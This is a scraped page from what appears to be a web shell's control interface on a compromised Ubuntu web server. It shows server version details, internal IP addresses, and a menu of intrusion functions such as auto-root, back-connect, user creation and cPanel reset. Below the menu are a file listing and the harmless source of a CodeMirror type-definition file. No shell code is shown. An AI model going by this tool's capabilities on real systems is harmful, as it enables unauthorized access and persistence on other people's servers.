Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@types /
codemirror /
addon /
edit /
[ HOME SHELL ]
Name
Size
Permission
Action
closebrackets.d.ts
1.43
KB
-rw-r--r--
closetag.d.ts
1.35
KB
-rw-r--r--
continuelist.d.ts
161
B
-rw-r--r--
matchbrackets.d.ts
1.08
KB
-rw-r--r--
matchtags.d.ts
680
B
-rw-r--r--
trailingspace.d.ts
251
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : closetag.d.ts
import '../../'; declare module '../../' { interface CommandActions { closeTag(cm: Editor): void; } interface AutoCloseTags { /** * Whether to autoclose when the '/' of a closing tag is typed. (default true) */ whenClosing?: boolean | undefined; /** * Whether to autoclose the tag when the final '>' of an opening tag is typed. (default true) */ whenOpening?: boolean | undefined; /** * An array of tag names that should not be autoclosed. (default is empty tags for HTML, none for XML) */ dontCloseTags?: ReadonlyArray<string> | undefined; /** * An array of tag names that should, when opened, cause a * blank line to be added inside the tag, and the blank line and * closing line to be indented. (default is block tags for HTML, none for XML) */ indentTags?: ReadonlyArray<string> | undefined; /** * An array of XML tag names that should be autoclosed with '/>'. (default is none) */ emptyTags: ReadonlyArray<string>; } interface EditorConfiguration { /** * Will auto-close XML tags when '>' or '/' is typed. * Depends on the fold/xml-fold.js addon. */ autoCloseTags?: AutoCloseTags | boolean | undefined; } }
Close